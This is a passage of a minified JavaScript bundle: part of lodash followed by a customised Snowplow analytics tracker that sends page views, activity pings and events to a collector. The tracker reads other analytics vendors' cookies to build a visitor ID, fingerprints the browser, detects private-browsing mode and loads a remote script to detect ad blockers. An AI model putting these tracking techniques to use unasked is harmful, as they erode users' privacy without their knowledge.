a.length&&H(a)?na(a):M(a):[]}:na;A={args:"collection, callback, thisArg",top:"callback = callback && typeof thisArg == 'undefined' ? callback : baseCreateCallback(callback, thisArg, 3)",array:"typeof length == 'number'",keys:R,loop:"if (callback(iterable[index], index, collection) === false) return result"};J={top:"if (!objectTypes[typeof iterable]) return result;\n"+A.top,array:!1};var za=q(A),ja=q(A,J,{useHas:!1}),Z=q(A,J);v(/x/)&&(v=function(a){return"function"==typeof a&&"[object Function]"==
F.call(a)});a.bind=W;a.compact=function(a){for(var b=-1,c=a?a.length:0,d=[];++b<c;){var f=a[b];f&&d.push(f)}return d};a.createCallback=function(a,b,c){var d=typeof a;if(null==a||"function"==d)return m(a,b,c);if("object"!=d)return E(a);var f=R(a),h=f[0],g=a[h];return 1!=f.length||g!==g||V(g)?function(b){for(var c=f.length,d=!1;c--&&(d=l(b[f[c]],a[f[c]],null,!0)););return d}:function(a){a=a[h];return g===a&&(0!==g||1/g==1/a)}};a.forIn=ja;a.forOwn=Z;a.keys=R;a.map=oa;a.property=E;a.collect=oa;a.identity=
y;a.isArguments=H;a.isArray=ha;a.isDate=function(a){return a&&"object"==typeof a&&"[object Date]"==F.call(a)||!1};a.isEmpty=function(a){var b=!0;if(!a)return b;var c=F.call(a),d=a.length;if("[object Array]"==c||"[object String]"==c||(w.argsClass?"[object Arguments]"==c:H(a))||"[object Object]"==c&&"number"==typeof d&&v(a.splice))return!d;Z(a,function(){return b=!1});return b};a.isFunction=v;a.isNull=function(a){return null===a};a.isObject=V;a.isString=Aa;a.isUndefined=function(a){return"undefined"==
typeof a};a.noop=N;a.VERSION="2.4.1";x&&B&&T&&((B.exports=a)._=a)}).call(this)}).call(this,"undefined"!==typeof global?global:"undefined"!==typeof self?self:"undefined"!==typeof window?window:{})},{}],14:[function(g,r,f){(function(){var p=g("JSON"),b=g("./lib_managed/lodash"),c=g("./lib/detectors").localStorageAccessible();("undefined"!==typeof f?f:this).OutQueueManager=function(a,f){function d(){if(1>n.length)g=!1;else{var a;g=!0;for(a in n)if(n[a]&&n.hasOwnProperty(a)){var f=n[a];if(!b.isString(l))throw"No Snowplow collector configured, cannot track";
(function(a){var b=new Image(1,1);b.onload=function(){delete n[a];c&&localStorage.setItem(h,p.stringify(n));d()};b.onerror=function(){};b.src=l+f})(a)}g=!1;0===b.compact(n).length&&(n=[])}}var h=["snowplowOutQueue",a,f].join("_"),g=!1,l;if(c)try{var n=p.parse(localStorage.getItem(h))}catch(q){}if("undefined"===typeof n||null==n)n=[];return{enqueueRequest:function(a,b){n.push(a);l=b;c&&localStorage.setItem(h,p.stringify(n));g||d()}}}})()},{"./lib/detectors":10,"./lib_managed/lodash":13,JSON:1}],15:[function(g,
r,f){(function(){var p=g("./lib_managed/lodash"),b=g("JSON"),c=g("./lib/base64"),a="undefined"!==typeof f?f:this;a.isJson=function(a){return!p.isUndefined(a)&&!p.isNull(a)&&(a.constructor==={}.constructor||a.constructor===[].constructor)};a.isNonEmptyJson=function(b){if(!a.isJson(b))return!1;for(var c in b)if(b.hasOwnProperty(c))return!0;return!1};a.payloadBuilder=function(f){var d="",g=function(a,b,c){void 0!==b&&null!==b&&""!==b&&(d+=(0<d.length?"&":"?")+a+"="+(c?encodeURIComponent(b):b))},h=function(a,
b){g(a,b,!0)},l=function(a,b){g(a,b,!1)};return{add:h,addRaw:l,addJson:function(d,g,m){a.isNonEmptyJson(m)&&(m=b.stringify(m),f?(g=m?c.base64encode(m).replace(/=/g,"").replace(/\+/g,"-").replace(/\//g,"_"):m,l(d,g)):h(g,m))},build:function(){return d}}}})()},{"./lib/base64":9,"./lib_managed/lodash":13,JSON:1}],16:[function(g,r,f){(function(){var p=g("./lib/helpers"),b=g("./in_queue"),c=g("./tracker");("undefined"!==typeof f?f:this).Snowplow=function(a,f){function d(){var a;if(!l.hasLoaded)for(l.hasLoaded=
!0,a=0;a<l.registeredOnLoadHandlers.length;a++)l.registeredOnLoadHandlers[a]();return!0}var g=document,h=window,l={expireDateTime:null,hasLoaded:!1,registeredOnLoadHandlers:[]};h.Snowplow={getTrackerCf:function(a){var b=new c.Tracker(f,"","js-2.0.7",l,{});b.setCollectorCf(a);return b},getTrackerUrl:function(a){var b=new c.Tracker(f,"","js-2.0.7",l,{});b.setCollectorCf(a);return b},getAsyncTracker:function(){return new c.Tracker(f,"","js-2.0.7",l,{})}};p.addEventListener(h,"beforeunload",function(){if(l.expireDateTime){do var a=
new Date;while(a.getTime()<l.expireDateTime)}},!1);(function(){var a;g.addEventListener?p.addEventListener(g,"DOMContentLoaded",function z(){g.removeEventListener("DOMContentLoaded",z,!1);d()}):g.attachEvent&&(g.attachEvent("onreadystatechange",function z(){"complete"===g.readyState&&(g.detachEvent("onreadystatechange",z),d())}),g.documentElement.doScroll&&h===h.top&&function H(){if(!l.hasLoaded){try{g.documentElement.doScroll("left")}catch(v){setTimeout(H,0);return}d()}}());/WebKit/.test(navigator.userAgent)&&
(a=setInterval(function(){if(l.hasLoaded||/loaded|complete/.test(g.readyState))clearInterval(a),d()},10));p.addEventListener(h,"load",d,!1)})();return new b.InQueueManager(c.Tracker,"js-2.0.7",l,a,f)}})()},{"./in_queue":7,"./lib/helpers":11,"./tracker":17}],17:[function(g,r,f){(function(){var p=g("./lib_managed/lodash"),b=g("./lib/helpers"),c=g("./lib/proxies"),a=g("browser-cookie-lite"),h=g("./lib/detectors"),d=g("./payload"),m=g("JSON"),r=g("sha1"),l=g("./out_queue");("undefined"!==typeof f?f:this).Tracker=
function(f,g,z,C,v){function n(a){if(!p.isEmpty(a))return{schema:"iglu:com.snowplowanalytics.snowplow/contexts/jsonschema/1-0-0",data:a}}function q(){var b=document.createElement("script");b.setAttribute("type","text/javascript");b.setAttribute("src",window.location.protocol+"//ivccftag.ivcbrasil.org.br/adserver.js");"undefined"!=typeof b&&document.getElementsByTagName("head")[0].appendChild(b);setTimeout(function(){"undefined"!=typeof window.audit_adblockdetected?a.cookie("abdAu","0",86400):a.cookie("abdAu",
"1",86400)},500)}function H(a){if(ma){var b=/#.*/;return a.replace(b,"")}return a}function W(a){return(a=/^([a-z]+):/.exec(a))?a[1]:null}function y(a,b){var c=new Date;w||(Ea.enqueueRequest(a,F),C.expireDateTime=c.getTime()+b)}function N(){X=wa((J||la)+(M||"/")).slice(0,4)}function E(){pa=(new Date).getTime()}function aa(){var a=va(),b=a[0];b<qa?qa=b:b>ra&&(ra=b);a=a[1];a<sa?sa=a:a>ua&&(ua=a);E()}function va(){var a=x.compatMode&&"BackCompat"!=x.compatMode?x.documentElement:x.body;return[a.scrollLeft||
B.pageXOffset,a.scrollTop||B.pageYOffset]}function ta(){var a=va(),b=a[0];ra=qa=b;ua=sa=a=a[1]}function da(){var b=Math.round((new Date).getTime()/1E3),c=a.cookie(K+"id."+X);c?(b=c.split("."),b.unshift("0")):(S||(""!=a.cookie("__utma")&&(S=a.cookie("__utma").split(".")[1]),""!=a.cookie("_ga")&&(S=a.cookie("_ga").split(".")[2]),""!=a.cookie("s_vi")&&(adobeCookie=a.cookie("s_vi").split("|")[1],"undefined"!=typeof adobeCookie&&(S=adobeCookie.replace("[CE]","").slice(0,16))),S=S?wa(S).slice(0,16):wa((T.userAgent||
"")+(T.platform||"")+(x.cookie||"")+m.stringify(Z)+b).slice(0,16)),b=["1",S,b,0,b,""]);return b}function P(b){var c,d=Math.round((new Date).getTime()/1E3);var f=K+"id."+X;var l=K+"ses."+X;var m=da();var n=a.cookie(K+"ses."+X),p=ca||Y;if(w&&D)return a.cookie(f,"",-1,M,J),a.cookie(l,"",-1,M,J),"";f=m[1];var q=m[2];var r=m[3];var Da=m[4];m=m[5];n||(r++,m=Da);b.addRaw("dtm",(new Date).getTime());b.addRaw("tid",String(Math.random()).slice(2,8));b.addRaw("vp",h.detectViewport());b.addRaw("ds",h.detectDocumentSize());
b.addRaw("vid",r);b.addRaw("duid",f);b.add("p",xa);b.add("tv",z);b.add("fp",u);b.add("aid",ya);b.add("lang",ja);b.add("cs",za);b.add("tz",t);b.add("uid",ea);b.add("tna",g);Q.length&&b.add("refr",H(Q));for(c in Z)Object.prototype.hasOwnProperty.call(Z,c)&&(n="res"===c||"cd"===c||"cookie"===c?"":"f_",b.addRaw(n+c,Z[c]));b.add("url",H(p));b=b.build();D&&(a.cookie(K+"id."+X,f+"."+q+"."+r+"."+d+"."+m,ha,M,J),a.cookie(l,"*",na,M,J));return b}function ka(a){return("https:"==x.location.protocol?"https":"http")+
"://"+a+"/i"}function G(a,c){var f=b.fixupTitle(a||I),g=d.payloadBuilder(R);g.add("e","pv");g.add("page",f);g.addJson("cx","co",n(c));g=P(g);y(g,O);g=new Date;U&&fa&&!Ba&&(Ba=!0,ta(),b.addEventListener(x,"click",E),b.addEventListener(x,"mouseup",E),b.addEventListener(x,"mousedown",E),b.addEventListener(x,"mousemove",E),b.addEventListener(x,"mousewheel",E),b.addEventListener(B,"DOMMouseScroll",E),b.addEventListener(B,"scroll",aa),b.addEventListener(x,"keypress",E),b.addEventListener(x,"keydown",E),
b.addEventListener(x,"keyup",E),b.addEventListener(B,"resize",E),b.addEventListener(B,"focus",E),b.addEventListener(B,"blur",E),pa=g.getTime(),setInterval(function(){var a=new Date;pa+fa>a.getTime()&&U<a.getTime()&&(a=d.payloadBuilder(R),a.add("e","pp"),a.add("page",f),a.addRaw("pp_mix",qa),a.addRaw("pp_max",ra),a.addRaw("pp_miy",sa),a.addRaw("pp_may",ua),a.addJson("cx","co",n(c)),ta(),a=P(a),y(a,O))},fa))}function L(a,b){return""!==a?a+b.charAt(0).toUpperCase()+b.slice(1):b}function ia(a){var c,
d,f=["","webkit","ms","moz"];if(!ba)for(d=0;d<f.length;d++){var g=f[d];if(Object.prototype.hasOwnProperty.call(x,L(g,"hidden"))){"prerender"===x[L(g,"visibilityState")]&&(c=!0);break}}c?b.addEventListener(x,g+"visibilitychange",function Fa(){x.removeEventListener(g+"visibilitychange",Fa,!1);a()}):a()}var x=document,B=window,T=navigator,A=c.fixupUrl(x.domain,B.location.href,b.getReferrer()),la=b.fixupDomain(A[0]),Y=A[1],Q=A[2];v=v||{};var xa=v.hasOwnProperty("platform")?v.platform:"web",F,ya=v.hasOwnProperty("idWeb")?
v.idWeb:"",ca,I=x.title,O=v.hasOwnProperty("pageUnloadTimer")?v.pageUnloadTimer:500,U,fa,ma,K=v.hasOwnProperty("cookieName")?v.cookieName:"_gada_",J=v.hasOwnProperty("cookieDomain")?v.cookieDomain:null,M,D=v.hasOwnProperty("writeCookies")?v.writeCookies:!0;A=T.doNotTrack||T.msDoNotTrack;var w=v.hasOwnProperty("respectDoNotTrack")?v.respectDoNotTrack&&("yes"===A||"1"===A):!1,ba,ha=63072E3,na=1800,R=v.hasOwnProperty("encodeBase64")?v.encodeBase64:!0;A=v.hasOwnProperty("userFingerprintSeed")?v.userFingerprintSeed:
123412414;var za=x.characterSet||x.charset,ja=T.userLanguage||T.language,Z=h.detectBrowserFeatures(K+"testcookie."+X),t=h.detectTimezone(),u=!1===v.userFingerprint?"":h.detectSignature(A),Ba=!1,pa,qa,ra,sa,ua,wa=r,X,S,ea,Ea=new l.OutQueueManager(f,g);v.hasOwnProperty("adblockDetection")?1==v.adblockDetection&&q():q();(function(a){var b=function(a,b){var c=0,d=!1,f=window.setInterval(function(){a()&&(window.clearInterval(f),b(d));50<c++&&(window.clearInterval(f),d=!0,b(d))},10)};if(window.webkitRequestFileSystem)window.webkitRequestFileSystem(window.TEMPORARY,
1,function(){d=!1},function(a){console.log(a);d=!0});else if(window.indexedDB&&/Firefox/.test(window.navigator.userAgent)){try{var c=window.indexedDB.open("test")}catch(Ca){var d=!0}"undefined"===typeof d&&b(function(){return"done"===c.readyState?!0:!1},function(a){a||(d=c.result?!1:!0)})}else{var f=document.documentMode||/Edge/.test(window.navigator.userAgent)?!0:!1;if(f){d=!1;try{window.indexedDB||(d=!0)}catch(Ca){d=!0}}else if(window.localStorage&&/Safari/.test(window.navigator.userAgent)){try{window.localStorage.setItem("test",
1)}catch(Ca){d=!0}"undefined"===typeof d&&(d=!1,window.localStorage.removeItem("test"))}}b(function(){return"undefined"!==typeof d?!0:!1},function(b){a(d)})})(function(b){b?a.cookie("privAu","1",86400):a.cookie("privAu","0",86400)});N();return{getUserId:function(){return ea},getDomainUserId:function(){return da()[1]},getDomainUserInfo:function(){return da()},setReferrerUrl:function(a){Q=a},setCustomUrl:function(a){var c=Y,d;W(a)?ca=a:"/"===a.slice(0,1)?ca=W(c)+"://"+b.getHostName(c)+a:(c=H(c),0<=
(d=c.indexOf("?"))&&(c=c.slice(0,d)),(d=c.lastIndexOf("/"))!==c.length-1&&(c=c.slice(0,d+1)),ca=c+a)},setDocumentTitle:function(a){I=a},discardHashTag:function(a){ma=a},setCookiePath:function(a){M=a;N()},setVisitorCookieTimeout:function(a){ha=a},setSessionCookieTimeout:function(a){na=a},addListener:function(a,b,c){addClickListener(a,b,c)},enableLinkClickTracking:function(a,b,c){C.hasLoaded?(configureLinkClickTracking(a,b,c),addClickListeners()):C.registeredOnLoadHandlers.push(function(){configureLinkClickTracking(a,
b,c);addClickListeners()})},refreshLinkClickTracking:function(){addClickListeners()},enableActivityTracking:function(a,b){U=(new Date).getTime()+1E3*a;fa=1E3*b},killFrame:function(){B.location!==B.top.location&&(B.top.location=B.location)},redirectFile:function(a){"file:"===B.location.protocol&&(B.location=a)},setCountPreRendered:function(a){ba=a},setUserId:function(a){ea=a},setUserIdFromLocation:function(a){ea=b.fromQuerystring(a,Y)},setUserIdFromReferrer:function(a){ea=b.fromQuerystring(a,Q)},setUserIdFromCookie:function(b){ea=
a.cookie(b)},setCollectorCf:function(a){F=ka(a+".cloudfront.net")},setCollectorUrl:function(a){F=ka(a)},trackPageView:function(a,b){ia(function(){G(a,b)})},trackVirtualPageView:function(a,c){ia(function(){var f=b.fixupTitle(a||I),g=d.payloadBuilder(R);g.add("e","vpv");g.add("page",f);g.addJson("cx","co",n(c));f=P(g);y(f,O)})},trackStructEvent:function(a,b,c,f,g,h){var l=d.payloadBuilder(R);l.add("e","se");l.add("se_ca",a);l.add("se_ac",b);l.add("se_la",c);l.add("se_pr",f);l.add("se_va",g);l.addJson("cx",
"co",n(h));a=P(l);y(a,O)},trackUnstructEvent:function(a,c){b.deleteEmptyProperties(a.data);if(!p.isEmpty(a.data)){var f={schema:"iglu:com.snowplowanalytics.snowplow/unstruct_event/jsonschema/1-0-0",data:a},g=d.payloadBuilder(R);g.add("e","ue");g.addJson("ue_px","ue_pr",f);g.addJson("cx","co",n(c));f=P(g);y(f,O)}}}}})()},{"./lib/detectors":10,"./lib/helpers":11,"./lib/proxies":12,"./lib_managed/lodash":13,"./out_queue":14,"./payload":15,JSON:1,"browser-cookie-lite":2,sha1:6}]},{},[8]);